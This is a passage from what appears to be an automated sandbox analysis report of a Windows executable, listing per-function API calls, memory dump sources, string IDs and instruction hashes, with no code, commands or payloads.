                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E012D75E0861DDBDF04AFE4DC48ADDBB78FB59711F400495D902B22A0DB38AA50B7A1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EFAADA
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EFAAE4
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EFAAF3
                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EFAAFA
                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EFAB10
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                                                                                      • Opcode ID: 0873a1346c55cb7206ae5de468a6d6e0af89ddad8db2bf27d157b68358ff2726
                                                                                                                                                                                                                                                      • Instruction ID: 607901fa0cc3a824ac4fe116f6bef3e66264970b64de0ff6dd1ec34222b5acd0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0873a1346c55cb7206ae5de468a6d6e0af89ddad8db2bf27d157b68358ff2726
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77F04F7530020C6FEB110FA4EC88E7B3B6DFF46758F040029FE45DB190CA6098019A61
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EFAA79
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EFAA83
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EFAA92
                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EFAA99
                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EFAAAF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                                                                                      • Opcode ID: 09fc3b0b49c0b1f836b5ef85cd0d01a191e58c750744cd57f4e05851c2804121
                                                                                                                                                                                                                                                      • Instruction ID: f3c09f8a1724d4c95b4d8a7558f204e31615a69986d97e1c9ab4f0578478e628
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09fc3b0b49c0b1f836b5ef85cd0d01a191e58c750744cd57f4e05851c2804121
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9AF04F792002186FEB115FA4AC89E7B3BACFF4A798F040429FE45DB290DA609C45DB61
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00EFEC94
                                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00EFECAB
                                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00EFECC3
                                                                                                                                                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 00EFECDF
                                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00EFECF9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3741023627-0
                                                                                                                                                                                                                                                      • Opcode ID: 7709594c44907a6374097ba366d7122c18a2d82205e56bfb856ca7319d7634c8
                                                                                                                                                                                                                                                      • Instruction ID: d9400c62ac24b368ae7def4b359fbb3c28334de854327f522384d88f71e04794
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7709594c44907a6374097ba366d7122c18a2d82205e56bfb856ca7319d7634c8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D01D63450079C9BEB245F10DE4EBA6B7B8FB10709F04155DBA42711E0DBF0B944CB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EndPath.GDI32(?), ref: 00EDB0BA
                                                                                                                                                                                                                                                      • StrokeAndFillPath.GDI32(?,?,00F3E680,00000000,?,?,?), ref: 00EDB0D6
                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00EDB0E9
                                                                                                                                                                                                                                                      • DeleteObject.GDI32 ref: 00EDB0FC
                                                                                                                                                                                                                                                      • StrokePath.GDI32(?), ref: 00EDB117
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2625713937-0
                                                                                                                                                                                                                                                      • Opcode ID: 9ad1b7eae84629f98a3176793cf509bc532cc85ec021ad55ee974f19e129c091
                                                                                                                                                                                                                                                      • Instruction ID: 267e18a3c0c18421407c2f16bf8589b7d107c66070658157c2c684db34834506
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ad1b7eae84629f98a3176793cf509bc532cc85ec021ad55ee974f19e129c091
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17F0193400024CEFDB219F69EC0C7A53B68FB117A6F189315E8A5551F0E7318997EF10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00F0F2DA
                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00F4DA7C,00000000,00000001,00F4D8EC,?), ref: 00F0F2F2
                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00F0F555
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                                                                                                      • API String ID: 948891078-24824748
                                                                                                                                                                                                                                                      • Opcode ID: 79c0f8ba6c0f02b464c2e4ac6e7675aaf27937ede2e4230526699747f921d4b2
                                                                                                                                                                                                                                                      • Instruction ID: da1651f8d939d68d963ac385349cd768f7c5a6fa58d7b3246874ee084c103ced
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79c0f8ba6c0f02b464c2e4ac6e7675aaf27937ede2e4230526699747f921d4b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78A14C71104201AFD300EF64CC91EAFB7E8EF98714F00595DF559A7292EB71EA4ACB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC53B1,?,?,00EC61FF,?,00000000,00000001,00000000), ref: 00EC662F
                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00F0E85D
                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00F4DA7C,00000000,00000001,00F4D8EC,?), ref: 00F0E876
                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00F0E893
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                                                                                                      • API String ID: 2126378814-24824748
                                                                                                                                                                                                                                                      • Opcode ID: 24b753e3cba72a06474195f63a486c970e2555d6a468fe638a19bf3952e240bb
                                                                                                                                                                                                                                                      • Instruction ID: 149e6e2bb73675ebbf0775450777aaf591786fb1db29715e8be02db9f09b3f67
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24b753e3cba72a06474195f63a486c970e2555d6a468fe638a19bf3952e240bb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6A126356043019FCB14DF14C584E5ABBE5BF89320F14895DF995AB3A2CB32EC46DB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00EE32ED
                                                                                                                                                                                                                                                        • Part of subcall function 00EEE0D0: __87except.LIBCMT ref: 00EEE10B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorHandling__87except__start
                                                                                                                                                                                                                                                      • String ID: pow
                                                                                                                                                                                                                                                      • API String ID: 2905807303-2276729525
                                                                                                                                                                                                                                                      • Opcode ID: b6c8552006f43364e460b9dee7075ac529e8387206f0b1d39dae2e30aa7d02ab
                                                                                                                                                                                                                                                      • Instruction ID: b0607cb5656eaa0017c9b5f485f204b2ff94aecfa0177b9f1a2185ea02cc75cd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6c8552006f43364e460b9dee7075ac529e8387206f0b1d39dae2e30aa7d02ab
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D518C31A0928D92CB157B36C9057BA3BD49B45715F20BD28F1D5A33F9EF348DC8A642
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00F5DC50,?,0000000F,0000000C,00000016,00F5DC50,?), ref: 00F04645
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00F046C5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BuffCharUpper$__itow__swprintf
                                                                                                                                                                                                                                                      • String ID: REMOVE$THIS
                                                                                                                                                                                                                                                      • API String ID: 3797816924-776492005
                                                                                                                                                                                                                                                      • Opcode ID: 01978ef85a1803bd32e33f586e93656a2add85644bbd85f1d49697a92d439f1c
                                                                                                                                                                                                                                                      • Instruction ID: c80515c3fc9ee5bf7b252be5dce08dc5800d53b46cf7e5904eb11bdb1c2a3db7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01978ef85a1803bd32e33f586e93656a2add85644bbd85f1d49697a92d439f1c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B418075A002099FCF00DF54C985AADB7F4FF45314F148069EA16AB392DB35ED42EB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F0430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EFBC08,?,?,00000034,00000800,?,00000034), ref: 00F04335
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00EFC1D3
                                                                                                                                                                                                                                                        • Part of subcall function 00F042D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EFBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00F04300
                                                                                                                                                                                                                                                        • Part of subcall function 00F0422F: GetWindowThreadProcessId.USER32(?,?), ref: 00F0425A
                                                                                                                                                                                                                                                        • Part of subcall function 00F0422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00EFBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00F0426A
                                                                                                                                                                                                                                                        • Part of subcall function 00F0422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00EFBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00F04280
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EFC240
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EFC28D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                      • Opcode ID: 17fbbce9a5debf5e2e2b0e69043b4f837cb61126f74777dc29ab224b19b8ad72
                                                                                                                                                                                                                                                      • Instruction ID: 01b88922035170b890ec0719c95a03b3043d852c0887eada415cb4566fbb6b2a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17fbbce9a5debf5e2e2b0e69043b4f837cb61126f74777dc29ab224b19b8ad72
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 204139B6A0021CAFDB10DFA4CD81AEEB7B8EF09300F104099FA45B7191DA757E45EB61
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F5DC00,00000000,?,?,?,?), ref: 00F2A6D8
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32 ref: 00F2A6F5
                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F2A705
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Long
                                                                                                                                                                                                                                                      • String ID: SysTreeView32
                                                                                                                                                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                      • Opcode ID: 2449a60458cbf7f308fd204c4df7a7b418e2d75ba3f9baa0156bb1a7c6eac1de
                                                                                                                                                                                                                                                      • Instruction ID: 7a17d39c49ec64e4ab52f12a4ca63932671af2b309e545cf16bdd0550f5cb09c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2449a60458cbf7f308fd204c4df7a7b418e2d75ba3f9baa0156bb1a7c6eac1de
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D31E131601219AFDB118F38DC45BEA7BA9FB49334F244325F975A32E0D730E851AB54
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F2A15E
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F2A172
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F2A196
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                                                                                                                      • String ID: SysMonthCal32
                                                                                                                                                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                      • Opcode ID: d9e20da176bbad929fa6b3b3765762579bcb532810c17569507e24758d888b7c
                                                                                                                                                                                                                                                      • Instruction ID: c2c7fd0605fb6f99369d467d0d39b4cb75f1b9aced0c7269df16f9a17e75111e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9e20da176bbad929fa6b3b3765762579bcb532810c17569507e24758d888b7c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD219F32510228BBDF158F94DC42FEA3B79EF48724F110214FE556B1D0D6B5AC61EB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F2A941
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F2A94F
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F2A956
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
